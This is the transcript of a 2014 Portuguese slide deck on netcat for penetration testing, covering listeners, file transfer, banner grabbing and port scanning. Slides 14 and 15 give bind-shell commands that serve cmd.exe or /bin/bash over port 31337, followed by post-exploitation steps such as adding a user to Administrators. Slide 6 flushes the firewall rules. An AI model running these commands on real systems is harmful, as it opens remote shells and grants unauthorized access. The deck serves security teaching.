1 / 24

Pentest com script shell & Perl

Pentest com script shell & Perl. Cerutti – IESGF - 2014. Ping broadcast. Veja a mascara da sura rede. O IP de broadcast é o que tem, segundo a máscara, todos os bits de host=1. Por exemplo: Meu IP na rede é 10.1.1.30 A mascara é 255.255.255.192 O end de broadcast será 10.1.1.33.

camille-vaughn
Download Presentation

Pentest com script shell & Perl

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. Pentest com script shell & Perl Cerutti – IESGF - 2014

  2. Ping broadcast • Veja a mascara da sura rede. • O IP de broadcast é o que tem, segundo a máscara, todos os bits de host=1. • Por exemplo: • Meu IP na rede é 10.1.1.30 • A mascara é 255.255.255.192 • O end de broadcast será 10.1.1.33

  3. root# ping 192.168.0.255 • PING 192.168.0.255 (192.168.0.255): 56 data bytes • 64 bytes from 192.168.0.150: icmp_seq=0 ttl=64 time=0.063 ms • 64 bytes from 192.168.0.165: icmp_seq=0 ttl=64 time=30.095 ms • 64 bytes from 192.168.0.150: icmp_seq=1 ttl=64 time=0.117 ms • 64 bytes from 192.168.0.165: icmp_seq=1 ttl=64 time=17.263 ms

  4. Netcat AccordingtoSecTools.org , Netcatisranked as theeighthfavorite network security tool (Nmap Security Scanner Project, 2011

  5. http://packetstormsecurity.org/files/download/14051/nc110.tgzhttp://packetstormsecurity.org/files/download/14051/nc110.tgz • sudoapt-getinstallnetcat-traditional

  6. Desativar firewall Iptables -F

  7. Chat interface

  8. Hypervisors

  9. Conectar porta • conectar porta alta qualquer, por exemplo portaTCP 1234 • $ nc -l 1234 • ncisnowlistening on port 1234 for a connection. On a second console (or a second • machine), connect to the machine and port beinglistened on: • $ nc 127.0.0.1 1234

  10. chat

  11. transferindo dados com Netcat • –vv (doublev) for additionalverbositythatwillgiveyouthenumberof • bytes transferredduring a file transfer. The –w switch instructsNetcattowait for a specific • numberofsecondsbefore timing out the connection. In ourexample, wespecify 30 seconds

  12. Transferencia no MAC-OSX • nc -v -w 30 -p 1234 –l > secret.txt • Start byusingnctolistenon a specificport, with output capturedinto a file: • $ nc -l 1234 > filename.out • Using a second machine, connect to the listeningncprocess, feedingit the file whichis to betrans- • ferred: • $ nchost.example.com 1234 < filename.in • After the file has been transferred, the connection will close automatically.

  13. banner grabbingwithNetcat

  14. Windows remoteshell (andsimple post-exploitationhi-jinks) • Preparingthelistener • nc –Lp 31337 –vv –e cmd.exe • Connectingtothetarget • nc 192.168.0.10 31337 • Dir c:/ • Md /invasao • net localgroup Administrators bob

  15. Linux shell • sudonc –lp 31337 –e /bin/bash • Connectingtothetarget • As Ihavedemonstrated in thepreviousexercise, yousimplyconnecttothe host (as shown • below) andtheportthatyouwanttoconnectto, andthelistenerwill serve upthebashshell • for you as follows: • nc 192.168.0.11 31337 • grep bob /etc/passwd

  16. Abrindo paginas web no servidor • $ echo -n "GET / HTTP/1.0\r\n\r\n" | nchost.example.com 80

  17. Enviando email • $ nclocalhost 25 << EOF • HELO host.example.com • MAIL FROM: <user@host.example.com> • RCPT TO: <user2@host.example.com> • DATA • Body of email. • . • QUIT • EOF

  18. Varredura de portas • $ nc -zhost.example.com 20-30 • Connection tohost.example.com 22 port [tcp/ssh] succeeded! • Connection tohost.example.com 25 port [tcp/smtp] succeeded! • The port range wasspecifiedtolimitthesearchtoports 20 - 30.

  19. which server software isrunning, andwhichversions. • o firstmake a connection, andthen break the connection whenthe banner hasbeenretrieved. • Thiscanbeaccomplishedbyspecifying a small timeout withthe-wflag, orperhapsbyissuing a "QUIT" • commandtothe server: • $ echo "QUIT" | nchost.example.com 20-30 • SSH-1.99-OpenSSH_3.6.1p2 • Protocol mismatch. • 220 host.example.com IMS SMTP Receiver Version 0.84 Ready

  20. Open a TCP connection toport 42 ofhost.example.comusing 10.1.2.3 as the IP for the local endofthe • connection: • $ nc -s 10.1.2.3 host.example.com 42 • Create and listen on a Unix Domain Socket: • $ nc -lU /var/tmp/dsocket • Connectto port 42 ofhost.example.com via an HTTP proxy at 10.2.3.4, port 8080. Thisexamplecould • also be used by ssh(1); see the ProxyCommanddirective in ssh_config(5) for more information. • $ nc -x10.2.3.4:8080 -Xconnecthost.example.com 42

  21. Scanning a range ofdeviceswith a script • for i in {10..12}; do nc –vv –n –w 1 192.168.0.$i 21-25 –z; done

  22. Official sites • Unix Netcat Homepage: http://nc110.sourceforge.net/ • GNU Netcat Project: http://netcat.sourceforge.net/ • Ncat– The Nmap Project: http://www.nmap.org/ncat

  23. Articlesandtutorials • Offensive Security explainshowtocreate a persistentbackdoorusingNetcatand • Metasploit'sMeterpreter: • http://www.offensive-security.com/metasploit-unleashed/Persistent_ • Netcat_Backdoor • CrazyNetcat Relays for Funand Profit: • http://pauldotcom.com/wiki/index.php/Episode195#Tech_Segment:_Crazy- • Ass_Netcat_Relays_for_Fun_and_Profit • SANS InstituteNetcatPocketCheatsheet: • http://www.sans.org/security-resources/sec560/netcat_cheat_sheet_ • v1.pdf • Some interesting use cases notcovered in this book byJohannesFranken: • http://www.jfranken.de/homepages/johannes/vortraege/netcat.en.html • A greatreference for usingNetcat for debugging SOAP and XML web servicesusing • Netcat: • http://parand.com/say/index.php/2005/03/11/simple-recipe-fordebugging- • web-services/

  24. Twitter • FollowThomas Wilhelm onTwitter: • https://twitter.com/#!/thomas_wilhelm • FollowBrian BaskinonTwitter: • https://twitter.com/#!/bbaskin • FollowMichael Scherer onTwitter: • https://twitter.com/#!/theprez98 • FollowEd SkoudisonTwitter: • https://twitter.com/#!/edskoudis • For more Open Sourceinformation, followPacktat: • http://twitter.com/#!/packtopensource

More Related